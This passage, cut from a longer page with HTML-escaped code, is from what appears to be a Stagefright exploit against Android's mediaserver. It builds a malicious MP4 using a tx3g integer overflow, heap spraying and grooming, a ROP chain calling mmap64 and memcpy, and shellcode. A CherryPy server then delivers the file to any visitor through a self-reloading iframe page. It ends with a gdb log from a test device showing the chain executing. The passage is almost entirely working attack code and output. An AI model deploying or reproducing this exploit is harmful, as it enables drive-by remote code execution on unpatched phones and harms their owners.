\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(mmap64)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># pc<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0xffffffff<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># fd\u00a0\u00a0\u00a0\u00a0\u00a0 (and then r4)<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> pad(<\/code>4<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># padding (and then r5)<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p64(<\/code>0<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># offset\u00a0 (and then r6, r7)<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(pop_r0_r1_r2_r3_pc)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># pc<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># memcpy(shellcode_address, <\/code><\/div>\n
\u00a0\u00a0<\/code>#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 spray_address + len(rop_stack),<\/code><\/div>\n
\u00a0\u00a0<\/code>#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 len(shellcode));<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(mmap_address)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r0 = dst<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(spray_address <\/code>+<\/code> 0x12c<\/code>)\u00a0\u00a0\u00a0 <\/code># r1 = src<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x110<\/code>)<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x33333333<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r3<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(ldr_lr_bx_lr)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># pc<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> pad(ldr_lr_bx_lr_stack_pad)<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(pop_r4_r5_r6_r7_pc)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># lr<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> pad(<\/code>4<\/code>)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x44444444<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r4<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x55555555<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r5<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x66666666<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r6<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x77777777<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r7<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(memcpy)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># pc<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x44444444<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r4<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x55555555<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r5<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x66666666<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r6<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x77777777<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r7<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(mmap_address <\/code>+<\/code> 80<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># pc<\/code><\/div>\n
\u00a0<\/code><\/div>\n
<\/div>\n
<\/div>\n
\u00a0\u00a0<\/code>while<\/code> len<\/code>(page) < <\/code>0x1000<\/code>:<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> shellcode<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>pssh <\/code>+<\/code>=<\/code> page <\/code>*<\/code> (size <\/code>\/<\/code>\/<\/code> 0x1000<\/code>)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> chunk(<\/code>'pssh'<\/code>, pssh)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> exploit_mp4():<\/code><\/div>\n
\u00a0\u00a0<\/code>ftyp <\/code>=<\/code> chunk(<\/code>\"ftyp\"<\/code>,<\/code>\"69736f6d0000000169736f6d\"<\/code>.decode(<\/code>\"hex\"<\/code>))<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>trak <\/code>=<\/code> ''<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># heap spray so we have somewhere to land our corrupted vtable <\/code><\/div>\n
\u00a0\u00a0<\/code># pointer<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># yes, we wrap this in a sample_table for a reason; the <\/code><\/div>\n
\u00a0\u00a0<\/code># NuCachedSource we will be using otherwise triggers calls to mmap,<\/code><\/div>\n
\u00a0\u00a0<\/code># leaving our large allocations non-contiguous and making our chance<\/code><\/div>\n
\u00a0\u00a0<\/code># of failure pretty high. wrapping in a sample_table means that we<\/code><\/div>\n
\u00a0\u00a0<\/code># wrap the NuCachedSource with an MPEG4Source, making a single <\/code><\/div>\n
\u00a0\u00a0<\/code># allocation that caches all the data, doubling our heap spray <\/code><\/div>\n
\u00a0\u00a0<\/code># effectiveness :-)<\/code><\/div>\n
\u00a0\u00a0<\/code>trak <\/code>+<\/code>=<\/code> sample_table(heap_spray(spray_size) <\/code>*<\/code> spray_count)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># heap groom for our MPEG4DataSource corruption<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># get the default size allocations for our MetaData::typed_data <\/code><\/div>\n
\u00a0\u00a0<\/code># groom allocations out of the way first, by allocating small blocks<\/code><\/div>\n
\u00a0\u00a0<\/code># instead.<\/code><\/div>\n
\u00a0\u00a0<\/code>trak <\/code>+<\/code>=<\/code> alloc_avcc(<\/code>8<\/code>)<\/code><\/div>\n
\u00a0\u00a0<\/code>trak <\/code>+<\/code>=<\/code> alloc_hvcc(<\/code>8<\/code>)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># we allocate the initial tx3g chunk here; we'll use the integer <\/code><\/div>\n
\u00a0\u00a0<\/code># overflow so that the allocated buffer later is smaller than the <\/code><\/div>\n
\u00a0\u00a0<\/code># original size of this chunk, then overflow all of the following <\/code><\/div>\n
\u00a0\u00a0<\/code># MPEG4DataSource object and the following pssh allocation; hence why<\/code><\/div>\n
\u00a0\u00a0<\/code># we will need the extra groom allocation (so we don't overwrite <\/code><\/div>\n
\u00a0\u00a0<\/code># anything sensitive...)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># | tx3g | MPEG4DataSource | pssh |<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow <\/code>=<\/code> 'A'<\/code> *<\/code> 32<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># | tx3g ----------------> | pssh |<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow <\/code>+<\/code>=<\/code> p32(spray_address)<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow <\/code>+<\/code>=<\/code> '0'<\/code> *<\/code> 0x48<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow <\/code>+<\/code>=<\/code> '0000'<\/code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # r4<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow <\/code>+<\/code>=<\/code> '0000'<\/code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # r5<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow <\/code>+<\/code>=<\/code> '0000'<\/code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # r6<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow <\/code>+<\/code>=<\/code> '0000'<\/code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # r7<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow <\/code>+<\/code>=<\/code> '0000'<\/code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # r8<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow <\/code>+<\/code>=<\/code> '0000'<\/code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # r9<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow <\/code>+<\/code>=<\/code> '0000'<\/code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # r10<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow <\/code>+<\/code>=<\/code> '0000'<\/code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # r11<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow <\/code>+<\/code>=<\/code> '0000'<\/code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # r12<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow <\/code>+<\/code>=<\/code> p32(spray_address <\/code>+<\/code> 0x20<\/code>) <\/code># sp<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow <\/code>+<\/code>=<\/code> p32(pop_pc)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># lr<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>trak <\/code>+<\/code>=<\/code> chunk(<\/code>\"tx3g\"<\/code>, overflow)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># defragment the for alloc_size blocks, then make our two<\/code><\/div>\n
\u00a0\u00a0<\/code># allocations. we end up with a spurious block in the middle, from<\/code><\/div>\n
\u00a0\u00a0<\/code># the temporary ABuffer deallocation.<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># | pssh | - | pssh |<\/code><\/div>\n
\u00a0\u00a0<\/code>trak <\/code>+<\/code>=<\/code> memory_leak(alloc_size) <\/code>*<\/code> groom_count<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># | pssh | - | pssh | .... | avcC |<\/code><\/div>\n
\u00a0\u00a0<\/code>trak <\/code>+<\/code>=<\/code> alloc_avcc(alloc_size)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># | pssh | - | pssh | .... | avcC | hvcC |<\/code><\/div>\n
\u00a0\u00a0<\/code>trak <\/code>+<\/code>=<\/code> alloc_hvcc(alloc_size)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># | pssh | - | pssh | pssh | avcC | hvcC | pssh |<\/code><\/div>\n
\u00a0\u00a0<\/code>trak <\/code>+<\/code>=<\/code> memory_leak(alloc_size) <\/code>*<\/code> 8<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># | pssh | - | pssh | pssh | avcC | .... |<\/code><\/div>\n
\u00a0\u00a0<\/code>trak <\/code>+<\/code>=<\/code> alloc_hvcc(alloc_size <\/code>*<\/code> 2<\/code>)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># entering the stbl chunk triggers allocation of an MPEG4DataSource<\/code><\/div>\n
\u00a0\u00a0<\/code># object<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># | pssh | - | pssh | pssh | avcC | MPEG4DataSource | pssh |<\/code><\/div>\n
\u00a0\u00a0<\/code>stbl <\/code>=<\/code> ''<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># | pssh | - | pssh | pssh | .... | MPEG4DataSource | pssh |<\/code><\/div>\n
\u00a0\u00a0<\/code>stbl <\/code>+<\/code>=<\/code> alloc_avcc(alloc_size <\/code>*<\/code> 2<\/code>)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># | pssh | - | pssh | pssh | tx3g | MPEG4DataSource | pssh |<\/code><\/div>\n
\u00a0\u00a0<\/code># | pssh | - | pssh | pssh | tx3g ----------------> |<\/code><\/div>\n
\u00a0\u00a0<\/code>overflow_length <\/code>=<\/code> (<\/code>-<\/code>(<\/code>len<\/code>(overflow) <\/code>-<\/code> 28<\/code>) & <\/code>0xffffffffffffffff<\/code>)<\/code><\/div>\n
\u00a0\u00a0<\/code>stbl <\/code>+<\/code>=<\/code> chunk(<\/code>\"tx3g\"<\/code>, '', length <\/code>=<\/code> overflow_length)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>trak <\/code>+<\/code>=<\/code> chunk(<\/code>'stbl'<\/code>, stbl)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> ftyp <\/code>+<\/code> chunk(<\/code>'trak'<\/code>, trak)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
index_page <\/code>=<\/code> '''<\/code><\/div>\n
<!DOCTYPE html><\/code><\/div>\n
<html><\/code><\/div>\n
\u00a0\u00a0<\/code><head><\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code><title>Stagefrightened!<\/title><\/code><\/div>\n
\u00a0\u00a0<\/code><\/head><\/code><\/div>\n
\u00a0\u00a0<\/code><body><\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code><script><\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>window.setTimeout('location.reload(true);', 400);<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code><\/script><\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code><iframe src='\/exploit.mp4'><\/iframe><\/code><\/div>\n
\u00a0\u00a0<\/code><\/body><\/code><\/div>\n
<\/html><\/code><\/div>\n
'''<\/code><\/div>\n
\u00a0<\/code><\/div>\n
class<\/code> ExploitServer(<\/code>object<\/code>):<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>exploit_file <\/code>=<\/code> None<\/code><\/div>\n
\u00a0\u00a0<\/code>exploit_count <\/code>=<\/code> 0<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>@cherrypy<\/code>.expose<\/code><\/div>\n
\u00a0\u00a0<\/code>def<\/code> index(<\/code>self<\/code>):<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>self<\/code>.exploit_count <\/code>+<\/code>=<\/code> 1<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>print<\/code> '*'<\/code> *<\/code> 80<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>print<\/code> 'exploit attempt: '<\/code> +<\/code> str<\/code>(<\/code>self<\/code>.exploit_count)<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>print<\/code> '*'<\/code> *<\/code> 80<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>return<\/code> index_page<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>@cherrypy<\/code>.expose([<\/code>\"exploit.mp4\"<\/code>])<\/code><\/div>\n
\u00a0\u00a0<\/code>def<\/code> exploit(<\/code>self<\/code>):<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>cherrypy.response.headers[<\/code>'Content-Type'<\/code>] <\/code>=<\/code> 'video\/mp4'<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>cherrypy.response.headers[<\/code>'Content-Encoding'<\/code>] <\/code>=<\/code> 'gzip'<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>if<\/code> self<\/code>.exploit_file <\/code>is<\/code> None<\/code>:<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>exploit_uncompressed <\/code>=<\/code> exploit_mp4()<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>with <\/code>open<\/code>(<\/code>'exploit_uncompressed.mp4'<\/code>, <\/code>'wb'<\/code>) as tmp:<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>tmp.write(exploit_uncompressed)<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>os.system(<\/code>'gzip exploit_uncompressed.mp4'<\/code>)<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>with <\/code>open<\/code>(<\/code>'exploit_uncompressed.mp4.gz'<\/code>, <\/code>'rb'<\/code>) as tmp:<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>self<\/code>.exploit_file <\/code>=<\/code> tmp.read()<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>os.system(<\/code>'rm exploit_uncompressed.mp4.gz'<\/code>)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>return<\/code> self<\/code>.exploit_file<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> main():<\/code><\/div>\n
\u00a0\u00a0<\/code>find_rop_gadgets(<\/code>'libc.so'<\/code>)<\/code><\/div>\n
\u00a0\u00a0<\/code>with <\/code>open<\/code>(<\/code>'exploit.mp4'<\/code>, <\/code>'wb'<\/code>) as tmp:<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>tmp.write(exploit_mp4())<\/code><\/div>\n
\u00a0\u00a0<\/code>cherrypy.server.socket_host <\/code>=<\/code> '0.0.0.0'<\/code><\/div>\n
\u00a0\u00a0<\/code>cherrypy.quickstart(ExploitServer()) <\/code><\/div>\n
if<\/code> __name__ <\/code>=<\/code>=<\/code> '__main__'<\/code>:<\/code><\/div>\n
\u00a0\u00a0<\/code>main()<\/code><\/div>\n
<\/div>\n
####################################################################################################<\/code><\/div>\n
Exploitation log on Test Device<\/code><\/div>\n
####################################################################################################<\/code><\/div>\n
<\/div>\n
(gdb) attach <\/code>24145<\/code><\/div>\n
Attaching to program: <\/code>\/<\/code>system<\/code>\/<\/code>bin<\/code>\/<\/code>mediaserver, process <\/code>24145<\/code><\/div>\n
[New LWP <\/code>24146<\/code>]<\/code><\/div>\n
[New LWP <\/code>24147<\/code>]<\/code><\/div>\n
[New LWP <\/code>24148<\/code>]<\/code><\/div>\n
[New LWP <\/code>24153<\/code>]<\/code><\/div>\n
[New LWP <\/code>24154<\/code>]<\/code><\/div>\n
[New LWP <\/code>24155<\/code>]<\/code><\/div>\n
[New LWP <\/code>24156<\/code>]<\/code><\/div>\n
[New LWP <\/code>24157<\/code>]<\/code><\/div>\n
[New LWP <\/code>24158<\/code>]<\/code><\/div>\n
[New LWP <\/code>24164<\/code>]<\/code><\/div>\n
[New LWP <\/code>24165<\/code>]<\/code><\/div>\n
[New LWP <\/code>24166<\/code>]<\/code><\/div>\n
warning: Could <\/code>not<\/code> load shared library symbols <\/code>for<\/code> 15<\/code> libraries, e.g. camera.msm8226.so.<\/code><\/div>\n
Use the <\/code>\"info sharedlibrary\"<\/code> command to see the complete listing.<\/code><\/div>\n
Do you need <\/code>\"set solib-search-path\"<\/code> or<\/code> \"set sysroot\"<\/code>?<\/code><\/div>\n
<\/div>\n
Thread <\/code>1<\/code> \"mediaserver\"<\/code> stopped.<\/code><\/div>\n
0xb6f2d83c<\/code> in<\/code> __ioctl () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) cont<\/code><\/div>\n
Continuing.<\/code><\/div>\n
[New LWP <\/code>24305<\/code>]<\/code><\/div>\n
[New LWP <\/code>24306<\/code>]<\/code><\/div>\n
[New LWP <\/code>24317<\/code>]<\/code><\/div>\n
[New LWP <\/code>24322<\/code>]<\/code><\/div>\n
[New LWP <\/code>24323<\/code>]<\/code><\/div>\n
[New LWP <\/code>24324<\/code>]<\/code><\/div>\n
[New LWP <\/code>24326<\/code>]<\/code><\/div>\n
<\/div>\n
Thread <\/code>1<\/code> \"mediaserver\"<\/code> hit Breakpoint <\/code>3<\/code>, <\/code>0xb6f05428<\/code> in<\/code> _longjmp ()<\/code><\/div>\n
\u00a0\u00a0\u00a0<\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) stepi<\/code><\/div>\n
0xb6f0542c<\/code> in<\/code> _longjmp () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f05430<\/code> in<\/code> _longjmp () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f05434<\/code> in<\/code> _longjmp () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f05438<\/code> in<\/code> _longjmp () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0543c<\/code> in<\/code> _longjmp () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f05440<\/code> in<\/code> _longjmp () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f05444<\/code> in<\/code> _longjmp () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f47974<\/code> in<\/code> _Unwind_GetGR () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f45338<\/code> in<\/code> pop () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f4835c<\/code> in<\/code> ___Unwind_RaiseException () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f48360<\/code> in<\/code> ___Unwind_RaiseException () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f48364<\/code> in<\/code> ___Unwind_RaiseException () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
[New LWP <\/code>24350<\/code>]<\/code><\/div>\n
[New LWP <\/code>24349<\/code>]<\/code><\/div>\n
0xb6f03672<\/code> in<\/code> __futex_wake_ex.constprop.<\/code>0<\/code> () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c540<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c544<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c546<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c54a<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c54c<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c550<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c552<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c556<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c558<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c55c<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
